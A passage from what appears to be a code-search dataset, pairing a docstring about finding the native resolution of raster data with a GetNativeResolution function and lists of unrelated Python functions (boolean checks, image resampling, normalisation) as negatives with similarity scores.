all(self.idxs.shape)\n elif type(self.idxs) == list:\n sh = np.array(self.idxs).shape\n if len(sh) >= 2:\n boolean = np.all(sh)\n return boolean", "def is_worthless(self):\n self.normalize()\n return self.all_details['normalized'] in WORTHLESS_UA_TYPES", "def can_contain(self):\n return False", "def test_contains_extra_bounds(self):\n dim = Real(\"yolo\", \"norm\", 0, 3, low=-3, high=+3)\n assert dists.uniform.rvs(-3, 3) in dim\n assert -4 
not in dim\n assert +4 not in dim\n assert (1, 2) not in dim", "def hasAtlasPos(self):\n return self.doesHaveAtlasPos", "def contains(self, point):\n if in_range(point[0], self.xrange) and in_range(point[0], self.yrange) and in_range(point[0], self.zrange):\n return True\n return False", "def IsBound(self) -> bool:", "def __cell_is_in_map(self, x, y) -> bool:\n return x >= 0 and y >= 0 and x < self.occupancy_map.info.width and y < self.occupancy_map.info.height", "def is_won(self):\n for tile in self:\n if not tile.is_mine and tile.visibility != 1:\n return False\n return True", "def ValidClusterRanges(self):\n for cluster_range in self.cluster_ranges:\n the_range = cluster_range.split(\"-\")\n print(f\"Checking that range {the_range} falls within our data area\")\n try:\n if int(the_range[0]) < self.low_data_cluster or int(the_range[1]) > self.high_data_cluster:\n print(f\"False. {the_range[0]} or {the_range[1]} is outside of our data area\")\n return False\n except TypeError as t_err:\n print(f\"Error. Range does not appear to be an int\")\n return False\n return True", "def is_sealed(self):\n return self.walls == Direction.All", "def has_geom(self):\n return bool(self.give_geom())", "def is_water(self):\n return False", "def is_water(self):\n return False", "def can_attack_world(self, world: World) -> bool:\n forces = self.context.calculate_forces(world)\n return (\n forces.space_forces <= self.max_space_force\n and (forces.space_forces - forces.missile_forces)\n < self.max_nonmissile_forces\n )", "def satifiesWinConditions(self, coordinates):\n if self.treasureCaptured and (self.x, self.y) in coordinates:\n return True\n else:\n return False", "def _inside(self, x, y):\n wx, wy, w, h = self._raw_graph_window_dim()\n if wx <= x < wx + w and wy <= y < wy + h:\n return True\n return False", "def isValidForSimulation(self):\n for position, myQuad in self.myDesign.quads.iteritems():\n if myQuad.components != {}:\n return 1\n return 0", "def is_full(self):\n\n current_board = self.current_board\n remaining_rows = 0\n\n for row in current_board:\n if \"-\" in set(row):\n remaining_rows += 1\n\n if remaining_rows == 0:\n return True\n else:\n return False", "def isWin(self):\n\n return self.tiles == self.winCdt", "def _is_small_net(self):\n dataset_name = self.params.dataset_name.lower()\n key_words = ['cifar', 'tinyimages', 'svhn']\n return any([k in dataset_name for k in key_words])", "def isPlayed(self):\n return bool(self.viewedLeafCount == self.leafCount)" ]
[ "0.6345008", "0.63167757", "0.61752814", "0.60833305", "0.60241663", "0.6015851", "0.5980115", "0.59584624", "0.5937705", "0.5922513", "0.5917669", "0.59084296", "0.5877617", "0.5835224", "0.5827307", "0.5806919", "0.5801645", "0.57821", "0.5778381", "0.57413006", "0.57294166", "0.57176024", "0.57168955", "0.5715005", "0.57148254", "0.5713452", "0.5700437", "0.56934506", "0.5690477", "0.56834704", "0.5671516", "0.56495833", "0.56487656", "0.5633129", "0.5620331", "0.5585798", "0.55845815", "0.5579061", "0.5575254", "0.5565395", "0.5564361", "0.5554601", "0.5553543", "0.555065", "0.5549018", "0.55473197", "0.5545934", "0.5545503", "0.55440986", "0.55415726", "0.5528029", "0.5523839", "0.5516372", "0.5513708", "0.55035424", "0.5502852", "0.5502389", "0.54958874", "0.5494785", "0.5493976", "0.54938775", "0.54918957", "0.54900086", "0.5489074", "0.5485017", "0.548476", "0.5484562", "0.54776025", "0.5477495", "0.5473537", "0.5471521", "0.5471521", "0.5466949", "0.5460795", "0.54567075", "0.5456264", "0.5456242", "0.54510087", "0.5448426", "0.5447151", "0.5446548", "0.5445015", "0.5434507", "0.54247504", "0.54246503", "0.54240036", "0.54225314", "0.5421749", "0.5415321", "0.54148155", "0.54107237", "0.54107237", "0.5406654", "0.54047304", "0.5396586", "0.53917164", "0.5391677", "0.53868324", "0.5386621", "0.5386443" ]
0.68909526
0
Gets the native resolution of the source data; this usually means upsampling the data, but if the pixel dimensions are slightly smaller than a given resolution, and equal within error tolerance, that resolution will get chosen as the native one.
def GetNativeResolution(self, transform=None, maximum=None): # Get the source projection's units for a 1x1 pixel, assuming square # pixels. width, height = self.GetPixelDimensions() src_pixel_size = min(abs(width), abs(height)) if transform is None: dst_pixel_size = src_pixel_size dst_ref = self.GetSpatialReference() else: # Transform these dimensions into the destination projection dst_pixel_size = transform.TransformPoint(src_pixel_size, 0)[0] dst_pixel_size = abs(dst_pixel_size) dst_ref = transform.dst_ref # We allow some floating point error between src_pixel_size and # dst_pixel_size based on the major circumference so that the error is # in the destination units error = max(*dst_ref.GetPixelDimensions(resolution=0)) / 128 # Find the resolution where the pixels are smaller than dst_pixel_size. for resolution in count(): if maximum is not None and resolution >= maximum: return resolution res_pixel_size = max( *dst_ref.GetPixelDimensions(resolution=resolution) ) if (res_pixel_size - dst_pixel_size) <= error: return resolution # Halve error each resolution error /= 2
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def change_resolution(img):\n scale_factor = np.random.choice(list(range(0, 6, 2)))\n if scale_factor == 0:\n return img\n downsample = nn.AvgPool2d(scale_factor)\n upsample = nn.UpsamplingNearest2d(scale_factor=scale_factor)\n new_res_img = upsample(downsample(img.unsqueeze(dim=1))).squeeze()\n return new_res_img", "def data_resampler (self, data):\r\n data = librosa.resample(data, orig_sr = original_sampling, target_sr = self.target_sampling)\r\n \r\n return data", "def rasterio_resample(dataset: Dataset, target_resolution: float, new_nodata: object = 'auto',\n resampling_method: Optional[rio_warp.Resampling] = rio_warp.Resampling.nearest,\n output_datatype: Optional[np.dtype] = np.float32) -> Dataset:\n\n # Detect if resolution is not square\n if dataset.meta[\"resolution\"][0] != dataset.meta[\"resolution\"][1]:\n raise RuntimeError(\"Tried to resample a dataset that doesn't have a square resolution!\")\n\n # Calculate scale factor\n scaling = int(dataset.meta[\"resolution\"][0]) / float(target_resolution)\n\n # Copy data from source Dataset\n source_crs = deepcopy(dataset.profile[\"crs\"])\n source_transform = deepcopy(dataset.profile[\"transform\"])\n source_nodata = deepcopy(dataset.nodata)\n\n # Calculate profile/transform and transfer elements\n new_transform = Affine(source_transform.a / scaling, source_transform.b, source_transform.c, source_transform.d,\n source_transform.e / scaling, source_transform.f)\n new_height = int(dataset.profile[\"height\"] * scaling)\n new_width = int(dataset.profile[\"width\"] * scaling)\n new_resolution = (target_resolution, target_resolution)\n new_nodata = source_nodata if new_nodata == \"auto\" else new_nodata\n new_crs = source_crs # [TODO] Add ability to change CRS in rasterio resample function\n\n # Update profile to match output\n dataset.nodata = new_nodata\n dataset.profile.update(\n res=(float(target_resolution), float(target_resolution)),\n transform=new_transform,\n height=new_height,\n width=new_width,\n nodata=new_nodata\n )\n dataset.profile.data[\"pixel_dimensions\"] = (float(target_resolution), float(target_resolution))\n dataset.meta[\"resolution\"] = new_resolution\n\n # Change datatype of all bands\n # [TODO] There may be a way to save memory by freeing old type ndarrays\n for band_id, band_value in dataset.bands.items():\n dataset.bands[band_id] = band_value.astype(output_datatype)\n\n # Run resampling on each band\n for band_key, band_data in dataset.bands.items():\n # Create an array in the correct resampled dimensions\n resampled_array = np.ma.asanyarray(np.empty(shape=(new_width, new_height), dtype=output_datatype))\n\n # Resample/warp\n rio_warp.reproject(band_data, resampled_array, src_transform=source_transform, dst_transform=new_transform,\n width=new_width, height=new_height, src_nodata=source_nodata, dst_nodata=new_nodata,\n src_crs=source_crs, dst_crs=new_crs, resample=resampling_method)\n\n # Set value in dictionary\n dataset.bands[band_key] = resampled_array\n\n return dataset", "def _sample_single(self):\n ss = super(SuperResolutions, self)._sample_single()\n image = ss['data']\n # Down sample\n max_down_sample = max(self.data_down_sample, self.label_down_sample)\n if self.is_down_sample:\n images = []\n images.append(image)\n for i in range(max_down_sample):\n image = self.downsample(image)\n images.append(image)\n data = images[self.data_down_sample]\n label = images[self.label_down_sample]\n return {'data': data, 'label': label}", "def get_raw_image_sizes() -> set:\n sizes = set()\n data = 
SUNRGBDTrainDataset(True, augment=False)\n for i in range(len(data)):\n sizes.add(data[i][0].shape)\n return sizes", "def resample(self):\n pass", "def data_type_ratio(self):\n if self.sample_size:\n return float(self.match_count) / self.sample_size\n return None", "def minimum_sampling(self):\n # TODO: Allow `Source` to understand when this returns None?\n return 1.", "def data_resolution_and_offset(data):\n res = (data[data.size - 1] - data[0]) / (data.size - 1.0)\n off = data[0] - 0.5 * res\n return numpy.asscalar(res), numpy.asscalar(off)", "def _compute_output_resolution(input_spatial_resolution, kernel_size, stride,\n total_padding):\n if (input_spatial_resolution is None) or (kernel_size is None) or (\n stride is None) or (total_padding is None):\n return None\n return int(\n math.ceil((\n input_spatial_resolution + total_padding - kernel_size + 1) / stride))", "def upsample(self, method):\n from scipy.signal import resample\n from scipy.ndimage.interpolation import zoom\n #print \"mm: 100 x 100 x 131\"\n #print \"Dims:\", self.D.shape\n fact = np.array(self.info.shape).astype(\"float32\") / np.array(self.info.read_shape).astype(\"float32\")+0.00001 # hrmpf!!\n if method == \"zoom\":\n print \"Resampling...\"\n self.D = zoom(self.D, fact).astype(\"float32\")\n elif method == \"resample\":\n print \"Resampling...\"\n a = self.info.resample_ax\n s = self.info.shape[a]\n self.D = resample(self.D, s, axis=a, window=10).astype(\"float32\")\n elif method == None:\n pass\n else:\n raise NotImplementedError(\"Unknown upsampling method: %s\" % method)\n #print \"Dims:\", self.D.shape\n print \"done.\"", "def get_resolution(testdata):\n diffs = np.transpose([testdata[1:, 0], np.diff(testdata[:, 0])])\n resolutions = ud.safedivide(diffs[:, 0], diffs[:, 1])\n # popt, pcov = scipy.optimize.curve_fit(fit_line, diffs[:, 0], resolutions, maxfev=1000000)\n # fitLine = fit_line(diffs[:, 0], *popt)\n # fitMax = np.max(fitLine)\n # fitMin = np.min(fitLine)\n # diffs_new = diffs[(1.2 * fitMin < resolutions) & (resolutions < 1.2 * fitMax)]\n # resolutions_new = resolutions[(1.2 * fitMin < resolutions) & (resolutions < 1.2 * fitMax)]\n # popt2, pcov2 = scipy.optimize.curve_fit(fit_line, diffs_new[:, 0], resolutions_new, maxfev=1000000)\n # plt.figure()\n # plt.plot(diffs[:,0], resolutions)\n # plt.plot(diffs[:, 0], fit_line(diffs[:, 0], *popt2), 'r-')\n # plt.show()\n # Currently use A * m ^1.5 (0.5?)\n # Maybe use a*M^b\n # return popt2\n return np.median(resolutions)", "def quickMinMax(self, targetSize=1e6):\n data = self.image\n if targetSize < 2: # keep at least two pixels\n targetSize = 2\n while True:\n h, w = data.shape[:2]\n if h * w <= targetSize: break\n if h > w:\n data = data[::2, ::] # downsample first axis\n else:\n data = data[::, ::2] # downsample second axis\n return self._xp.nanmin(data), self._xp.nanmax(data)", "def test_alt_source(self):\n sp2 = SourceSpectrum(\n GaussianFlux1D, amplitude=self.sp.model.amplitude.value,\n mean=self.sp.model.mean.value, stddev=self.sp.model.stddev.value)\n w = [3900, 4000, 4060] * u.AA\n assert_quantity_allclose(sp2(w), self.sp(w))", "def test_resample_methods():\n with xr.open_rasterio(TEST_RASTER_PATH) as src:\n try:\n cvs.raster(src, upsample_method='santaclaus', downsample_method='toothfairy')\n except ValueError:\n pass\n else:\n assert False\n\n try:\n cvs.raster(src, upsample_method='honestlawyer')\n except ValueError:\n pass\n else:\n assert False\n\n try:\n cvs.raster(src, downsample_method='tenantfriendlylease')\n except ValueError:\n pass\n 
else:\n assert False", "def get_resolution(self):\n ret_val = False\n width = 0\n height = 0\n try:\n sink = self.player.get_by_name('sink')\n sample = GstBase.BaseSink.get_last_sample(sink)\n caps = Gst.Sample.get_caps(sample)\n struct = Gst.Caps.get_structure(caps, 0)\n h_result, height = Gst.Structure.get_int(struct, \"height\")\n w_result, width = Gst.Structure.get_int(struct, \"width\")\n if h_result and w_result:\n ret_val = True\n except:\n ret_val = False\n\n return ret_val, width, height", "def preprocess_data(tensors_lr):\n n = input_radius\n m = upsample_rate\n\n # flatten DT matrices\n s = tensors_lr.shape\n print(\"Low resolution tensors shape:\", s)\n tensors_lr = np.reshape(tensors_lr, (s[0], s[1], s[2], 9))\n\n # the target resolution after upsampling\n target_resolution = (s[0]*m, s[1]*m, s[2]*m, 3, 3)\n print(\"Target resolution after upsampling:\", target_resolution)\n\n # remove duplicate entries to obtain the 6 unique parameters\n tensors_lr = np.delete(tensors_lr, [3, 6, 7], axis=3)\n\n all_indices = utils.create_triples(s[0], s[1], s[2])\n\n return all_indices, tensors_lr, target_resolution", "def _resolution(self):\n _, xres, _, _, _, yres = self.geotransform\n return xres, yres", "def minimum_sampling(self):\n # Sampling in arcsec / pixel\n sampling = self.seeing.minimum_sampling()\n try:\n # Try using `intrinsic` as an object\n sampling = min(self.intrinsic.minimum_sampling(), sampling)\n except AttributeError:\n pass\n return sampling", "def test_read_unscale():\n with rasterio.open(COG_SCALE) as src_dst:\n arr, mask = reader.tile(src_dst, 218, 99, 8, tilesize=128)\n arrS, maskS = reader.tile(src_dst, 218, 99, 8, tilesize=128, unscale=True)\n\n assert arr.dtype == \"int16\"\n assert arrS.dtype == \"float32\"\n assert not numpy.array_equal(arr, arrS)\n numpy.testing.assert_array_equal(mask, maskS)\n\n meta = reader.metadata(src_dst)\n assert isinstance(meta[\"statistics\"][1][\"min\"], int)\n\n meta = reader.metadata(src_dst, unscale=True)\n assert isinstance(meta[\"statistics\"][1][\"min\"], float)\n\n p = reader.point(src_dst, [310000, 4100000], coord_crs=src_dst.crs)\n assert p == [8917]\n\n p = reader.point(\n src_dst, [310000, 4100000], coord_crs=src_dst.crs, unscale=True\n )\n assert round(p[0], 3) == 1000.892", "def GetResolution(vDataSet):\r\n xmin,xmax,ymin,ymax,zmin,zmax = GetExtent(vDataSet)\r\n nx,ny,nz = vDataSet.GetSizeX(),vDataSet.GetSizeY(),vDataSet.GetSizeZ()\r\n\r\n return (xmax-xmin)/nx, (ymax-ymin)/ny, (zmax-zmin)/nz", "def test_fit(self, model):\r\n fit = model/np.linalg.norm(model, axis=1, keepdims=True)\r\n if self.white:\r\n sources = self.sources.dot(self.zca_matrix)\r\n sources /= np.linalg.norm(sources, axis=1, keepdims=True)\r\n else:\r\n sources = self.sources\r\n allthedots = sources.dot(fit.T)\r\n # how close is the closest model source to each true source?\r\n bestfits = np.max(np.abs(allthedots), axis=1)\r\n return np.median(bestfits)", "def __call__(self, src, label):\r\n # img = mx.nd.image.to_tensor(src)\r\n # img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)\r\n src = mx.nd.array(src)\r\n img = mx.nd.image.to_tensor(src)\r\n img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)\r\n return img, mx.nd.array(label, dtype=img.dtype)", "def resample(self):\n # propagate networks\n self.z = self.prior_latent_distribution.sample()\n # reconstruct image\n self.y_hat_raw = self.fcomb(self.unet_features, self.z)\n\n return self.y_hat_raw", "def test_single_image_dataset_train_interpolation(mocker, 
simple_img):\n\n # This is in X, Y cooridnates\n fake_random_data = torch.Tensor(\n np.array(\n [\n [0.001, 0], # top left\n [0, 0.999], # bottom left\n [0.999, 0], # top right\n ]\n )\n )\n\n mock_random = mocker.patch(\"dataset.torch.rand\")\n mock_random.return_value = fake_random_data\n\n dataset = SingleImageDataset(simple_img, 3, normalize=False)\n assert len(dataset) == 9\n\n dataloader = DataLoader(dataset, batch_size=None, batch_sampler=None)\n\n n_iter = 0\n for x, y in dataloader:\n n_iter += 1\n x = x.numpy()\n y = y.numpy()\n expected_x = np.array(\n [\n [-0.998, -1], # Top left\n [-1, 0.998], # Bottom left\n [0.998, -1], # Top right\n ]\n )\n assert np.isclose(expected_x, x).all()\n\n expected_y = np.array(\n [\n [1.0, 2.0, 3.0],\n [4.0, 5.0, 6.0],\n [7.0, 8.0, 9.0],\n ]\n )\n assert np.isclose(expected_y, y, atol=0.05).all()\n\n assert n_iter == 9", "def __call__(self, src, label, mask):\n # resize shorter side but keep in max_size\n h, _, _ = src.shape\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n # no scaling ground-truth, return image scaling ratio instead\n im_scale = float(img.shape[0]) / h\n\n img = mx.nd.image.to_tensor(img)\n img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)\n return img, mx.nd.array([img.shape[-2], img.shape[-1], im_scale])", "def __call__(self, src, label):\n # resize shorter side but keep in max_size\n h, w, _ = src.shape\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n # no scaling ground-truth, return image scaling ratio instead\n bbox = tbbox.resize(label, (w, h), (img.shape[1], img.shape[0]))\n im_scale = h / float(img.shape[0])\n\n img = mx.nd.image.to_tensor(img)\n img = mx.nd.image.normalize(img, mean=self._mean, std=self._std)\n return img, bbox.astype('float32'), mx.nd.array([im_scale])", "def upsampleImage( arr, kernelSize ):\n return scipy.ndimage.zoom( arr, kernelSize )", "def resample(source, target_size, transform):\n dtype = source.dtype\n dev = source.device\n\n height_, width_ = target_size\n ur_ = torch.arange(width_, dtype=dtype, device=dev) + 0.5\n vr_ = torch.arange(height_, dtype=dtype, device=dev) + 0.5\n\n height, weight = source.shape[2:]\n ur = 2 * ((ur_ + transform[0, 1]) / transform[0, 0]) / weight - 1\n vr = 2 * ((vr_ + transform[1, 1]) / transform[1, 0]) / height - 1\n\n v, u = torch.meshgrid(vr, ur)\n v = v.unsqueeze(2)\n u = u.unsqueeze(2)\n\n grid = torch.cat((u, v), dim=2)\n grid = grid.unsqueeze(0).expand(len(source), -1, -1, -1)\n\n return torch.nn.functional.grid_sample(source, grid)", "def calculate_image_scale(source_width, source_height, target_width, target_height):\n if source_width == target_width and source_height == target_height:\n return 1.0\n\n source_ratio = source_width / source_height\n target_ratio = target_width / target_height\n\n if target_ratio < source_ratio:\n scale = target_width / source_width\n else:\n scale = target_height / source_height\n\n return scale", "def _get_sample_size(self, data):\n if self._samples_per_update:\n return self._samples_per_update\n\n len_data = len(data)\n if len_data <= self._min_sample_size:\n return int(len_data)\n return max(int(self._sampling_ratio * len_data), self._min_sample_size)", "def __init__(self, data, pixscale = 7.77/43):\n self.data = data\n self.pixscale = pixscale", "def upsample_nearest(input, size=None, scale_factor=None):\n return interpolate(input, size, scale_factor, 'nearest')", "def src_simple(input_data, output_data, ratio, converter_type, channels):\n 
input_frames, _ = _check_data(input_data)\n output_frames, _ = _check_data(output_data)\n data = ffi.new('SRC_DATA*')\n data.input_frames = input_frames\n data.output_frames = output_frames\n data.src_ratio = ratio\n data.data_in = ffi.cast('float*', ffi.from_buffer(input_data))\n data.data_out = ffi.cast('float*', ffi.from_buffer(output_data))\n error = _lib.src_simple(data, converter_type, channels)\n return error, data.input_frames_used, data.output_frames_gen", "def set_resolution(self):\n file_name = os.path.basename(self.in_file)\n if '1KM' in file_name:\n self.resolution = 1000\n else:\n raise ValueError(\n 'Cant read this data, please check its resolution: {}'.format(self.in_file))", "def mold_image(images, config):\n return images.astype(np.float32) - config.MEAN_PIXEL", "def mold_image(images, config):\n return images.astype(np.float32) - config.MEAN_PIXEL", "def __call__(self, src, label):\n\n h, w, _ = src.shape\n # interp = np.random.randint(0, 5)\n img = timage.resize_short_within(src, self._short, self._max_size, interp=1)\n img, flips = timage.random_flip(img, px=0.5)\n img = img.astype(np.float32)\n\n if self.teacher_aug:\n target_image_1 = self.random_color_aug(img)\n else:\n target_image_1 = img\n target_image_2 = self.random_color_aug(img)\n\n # target_image_1 = mx.nd.image.to_tensor(target_image_1)\n target_image_1 = mx.nd.image.to_tensor(target_image_1)\n target_image_1 = mx.nd.image.normalize(target_image_1, mean=self._mean, std=self._std)\n\n target_image_2 = mx.nd.image.to_tensor(target_image_2)\n target_image_2 = mx.nd.image.normalize(target_image_2, mean=self._mean, std=self._std)\n\n return target_image_1, target_image_2", "def prep(self):\n print\n print 'Filtering rawdata to data as masked array...'\n# using 0 as flag\n# self.data = n.ma.masked_array(self.rawdata[:self.nints,:, self.chans,:], self.rawdata[:self.nints,:, self.chans,:] == 0j)\n# using standard flags\n self.data = n.ma.masked_array(self.rawdata[:self.nints,:, self.chans,:], self.flags[:self.nints,:, self.chans,:] == 0) # mask of True for flagged data (flags=0 in tpipe, which is flags=False in Miriad and flags=True in MS)\n self.dataph = (self.data.mean(axis=3).mean(axis=1)).real #dataph is summed and detected to form TP beam at phase center, multi-pol\n self.min = self.dataph.min()\n self.max = self.dataph.max()\n print 'Shape of data:'\n print self.data.shape\n print 'Dataph min, max:'\n print self.min, self.max\n\n self.freq = self.freq_orig[self.chans]\n\n self.track0 = self.track(0.)\n self.twidth = 0\n for k in self.track0[1]:\n self.twidth = max(self.twidth, len(n.where(n.array(self.track0[1]) == k)[0]))\n\n print 'Track width in time: %d. Iteration could step by %d/2.' % (self.twidth, self.twidth)", "def _get_normalized_flow_countrywide(x_sample):\n global win; win /= 3\n global nebr; nebr = 7 # nebr /= 3\n global norm_min; norm_min = norm_min * 1. / 3\n global MIN_FLOW_NORM; MIN_FLOW_NORM = MIN_FLOW_NORM * 1. 
/ 3\n global MIN_MOVE_PIXEL; MIN_MOVE_PIXEL /= (6*6)\n \n prev_frame = norm_trans(x_sample[-2])\n next_frame = norm_trans(x_sample[-1])\n kernel_shape = (79, 79) # (477/6, 477/6)\n flow = cv2.calcOpticalFlowFarneback(prev_frame, next_frame, 0.5,3,win, 3, nebr, nebr/4, cv2.OPTFLOW_FARNEBACK_GAUSSIAN)\n \n # flow_norm = numpy.linalg.norm(flow, axis=2) # for numpy version >= 1.8\n flow_norm = np.sum(flow**2, axis=2)**(1./2) # for numpy version < 1.8\n \n kernel = np.ones(kernel_shape, np.float32)\n\n# num_moved_flows = numpy.sum(flow_norm>norm_min)\n num_moved_flows = cv2.filter2D((flow_norm>norm_min).astype('float32'), -1, kernel, borderType=cv2.BORDER_REPLICATE)\n\n# if num_moved_flows > MIN_MOVE_PIXEL:\n# flow_fliter = numpy.zeros(shape=flow.shape);\n# flow_fliter[:,:,0] = flow[:,:,0] * (flow_norm > norm_min)\n# flow_fliter[:,:,1] = flow[:,:,1] * (flow_norm > norm_min)\n# \n# flow_mean = numpy.sum(flow_fliter, axis=(0,1)) / num_moved_flows\n# else:\n# flow_mean = numpy.array([0,0])\n \n flow_filter = flow * (flow_norm > norm_min)[:, :, np.newaxis]\n flow_mean = np.zeros_like(flow)\n flow_mean[:,:,0] = cv2.filter2D(flow_filter[:,:,0], -1, kernel, borderType=cv2.BORDER_REPLICATE) / (num_moved_flows + 0.00001)\n flow_mean[:,:,1] = cv2.filter2D(flow_filter[:,:,1], -1, kernel, borderType=cv2.BORDER_REPLICATE) / (num_moved_flows + 0.00001)\n flow_mean = flow_mean * (num_moved_flows > MIN_MOVE_PIXEL)[:, :, np.newaxis]\n\n# flow_mean_norm = np.sum(flow_mean**2)**(1./2)\n# if flow_mean_norm > MIN_FLOW_NORM:\n# flow_norm = flow_norm.reshape((flow_norm.shape[0], flow_norm.shape[1], 1)) \n# flow = flow * (flow_norm < MIN_FLOW_NORM) * flow_mean_norm / flow_norm + flow * (flow_norm >= MIN_FLOW_NORM)\n flow_mean_norm = np.sum(flow_mean**2, axis=2)**(1./2)\n flow = flow * ((flow_norm < MIN_FLOW_NORM) * (flow_mean_norm > MIN_FLOW_NORM) * flow_mean_norm / (flow_norm + 0.000001))[:, :, np.newaxis] + \\\n flow * ((flow_norm >= MIN_FLOW_NORM) | (flow_mean_norm <= MIN_FLOW_NORM))[:, :, np.newaxis] \n return flow", "def normalize_data_unit_interval(data):\n if data.dtype == 'float32':\n return\n return data.astype('float32') / 255.0", "def test_thresholded_image(self):\n orig_size = self._image.size\n self._api.SetImage(self._image)\n image = self._api.GetThresholdedImage()\n self.assertIsNot(image, None)\n self.assertIsInstance(image, Image.Image)\n self.assertEqual(image.size, orig_size)\n self.assertEqual(self._api.GetThresholdedImageScaleFactor(), 1)", "def normalize_dataset(self):", "def get_url_for_min_resolution(self, min_height, min_width, image):", "def _process(self, data: np.ndarray) -> np.ndarray:\n return data[..., 1] * self.scale", "def testSmallSrc(self):\n fromWcs = afwGeom.makeSkyWcs(\n crpix=lsst.geom.Point2D(0, 0),\n crval=lsst.geom.SpherePoint(359, 0, lsst.geom.degrees),\n cdMatrix=afwGeom.makeCdMatrix(scale=1.0e-8*lsst.geom.degrees),\n )\n fromExp = afwImage.ExposureF(afwImage.MaskedImageF(1, 1), fromWcs)\n\n toWcs = afwGeom.makeSkyWcs(\n crpix=lsst.geom.Point2D(0, 0),\n crval=lsst.geom.SpherePoint(358, 0, lsst.geom.degrees),\n cdMatrix=afwGeom.makeCdMatrix(scale=1.1e-8*lsst.geom.degrees),\n )\n toExp = afwImage.ExposureF(afwImage.MaskedImageF(10, 10), toWcs)\n\n warpControl = afwMath.WarpingControl(\"lanczos3\")\n # if a bug described in ticket #2441 is present, this will raise an\n # exception:\n numGoodPix = afwMath.warpExposure(toExp, fromExp, warpControl)\n self.assertEqual(numGoodPix, 0)\n self.assertTrue(np.all(np.isnan(toExp.image.array)))\n 
self.assertTrue(np.all(np.isinf(toExp.variance.array)))\n noDataBitMask = afwImage.Mask.getPlaneBitMask(\"NO_DATA\")\n self.assertTrue(np.all(toExp.mask.array == noDataBitMask))", "def upsample(x):\n return F.interpolate(x, scale_factor=2, mode=\"nearest\")", "def __reduce__(self):\n return ImageNetDownsample, (self.cutout,)", "def __len__(self):\n return self._num_samples_per_file * len(self._files) // self._world_size", "def read(self):\n try:\n if self.Data.Sync.IsWritten == 1:\n\n if self._IsPauseOn:\n self.Data.Sync.IsPauseOn = 1\n else:\n self.Data.Sync.IsPauseOn = 0\n\n Width = self.Data.Image.ImageWidth\n Height = self.Data.Image.ImageHeight\n\n # Image = np.fromstring(self.Data.Image.Data, np.uint8, Width * Height * self.TARGET_IMAGE_CHANNELS)\n Image = np.frombuffer(self.Data.Image.Data, np.uint8, Width * Height * self.TARGET_IMAGE_CHANNELS)\n Image = Image.reshape(Height, Width, self.TARGET_IMAGE_CHANNELS)\n\n AspectRatio = Width / Height\n TargetWidth = int(self._TargetResolution[1] * AspectRatio)\n\n if TargetWidth >= self._TargetResolution[0]:\n if Width != TargetWidth or Height != self._TargetResolution[1]:\n Image = cv2.resize(Image, (TargetWidth, self._TargetResolution[1]))\n\n if TargetWidth != self._TargetResolution[0]:\n XStart = int(TargetWidth/2 - self._TargetResolution[0]/2)\n XStop = int(TargetWidth/2 + self._TargetResolution[0]/2)\n Image = Image[:, XStart:XStop]\n\n else:\n TargetHeight = int(self._TargetResolution[0]/AspectRatio)\n\n if Width != self._TargetResolution[0] or Height != TargetHeight:\n Image = cv2.resize(Image, (self._TargetResolution[1], TargetHeight))\n\n if TargetHeight != self._TargetResolution[1]:\n YStart = int(TargetHeight/2 - self._TargetResolution[1]/2)\n YStop = int(TargetHeight/2 + self._TargetResolution[1]/2)\n Image = Image[YStart:YStop, :]\n\n # Shall we convert this to 0 - 1 ?\n self._RawImage = Image\n self._Image = cv2.flip(Image, 0)\n\n # This one does not flip the image, but it rotate and crop !!\n # self._Image = np.array(cv2.flip(Image, 0)/255, dtype=np.float32)\n # self._Image = cv2.flip(Image, 0)\n\n\n # This one is flipped upside/down\n # print(\"Image from memory reshaped as WxH with Mean\", Width, Height, np.mean((self._Image), axis=(0, 1)))\n # self.store_to_file(self._Image)\n\n return True\n except:\n print(\"Unexpected error in Shared Memory Read\", sys.exc_info()[0])\n\n return False", "def preprocess(self, data):\n (w,h,f) = self.rawinputformat()\n dt = numpy.dtype(numpy.uint8)\n nb = numpy.frombuffer(data,dt,-1,0)\n actual_stream_width = (w&1)+w # hack, rather get this from the app sink\n if(actual_stream_width != self.reqsize):\n nb = nb.reshape(h,actual_stream_width,3)\n nb = nb[0:h,0:w,0:3] # crop to network input size\n else:\n nb = nb.reshape((actual_stream_width,actual_stream_width,3))\n img = nb.astype('float32')\n #Preprocess image\n #for i in range(3):\n # img[:,:,i] = (img[:,:,i] - self.mean[i]) * self.std[i]\n #img = resize(img/255.0,(w,h),1)\n img = img/255.0\n print(img.shape)\n #print(img[0,0,:])\n return img.astype(numpy.float16)", "def minimum_sampling(self):\n return self.r_eff/3.", "def prep(self):\n print\n print 'Filtering rawdata to data as masked array...'\n# using 0 as flag\n# self.data = n.ma.masked_array(self.rawdata[:self.nints,:, self.chans,:], self.rawdata[:self.nints,:, self.chans,:] == 0j)\n# using standard flags\n self.data = n.ma.masked_array(self.rawdata[:self.nints,:, self.chans,:], self.flags[:self.nints,:, self.chans,:] == 0) # mask of True for flagged data (flags=0 in tpipe, which 
is flags=False in Miriad and flags=True in MS)\n self.dataph = (self.data.mean(axis=3).mean(axis=1)).real #dataph is summed and detected to form TP beam at phase center, multi-pol\n self.min = self.dataph.min()\n self.max = self.dataph.max()\n print 'Shape of data:'\n print self.data.shape\n print 'Dataph min, max:'\n print self.min, self.max\n\n self.freq = self.freq_orig[self.chans]\n\n # set up ur tracks (lol)\n self.dmtrack0 = {}\n self.twidths = {}\n for dmbin in xrange(len(self.dmarr)):\n self.dmtrack0[dmbin] = self.dmtrack(self.dmarr[dmbin],0) # track crosses high-freq channel in first integration\n self.twidths[dmbin] = 0\n for k in self.dmtrack0[dmbin][1]:\n self.twidths[dmbin] = max(self.twidths[dmbin], len(n.where(n.array(self.dmtrack0[dmbin][1]) == k)[0]))\n\n print 'Track width in time: '\n for dmbin in self.twidths:\n print 'DM=%.1f, twidth=%d. Iteration could step by %d/2.' % (self.dmarr[dmbin], self.twidths[dmbin], self.twidths[dmbin])", "def upsample(X, y, seed):\n ros = RandomOverSampler(random_state=seed)\n X_resampled, y_resampled = ros.fit_resample(X, y)\n return X_resampled, y_resampled", "def near_surface_samples(self):\n if self._near_surface_samples is None:\n if self.is_from_directory:\n nss_sample_path = 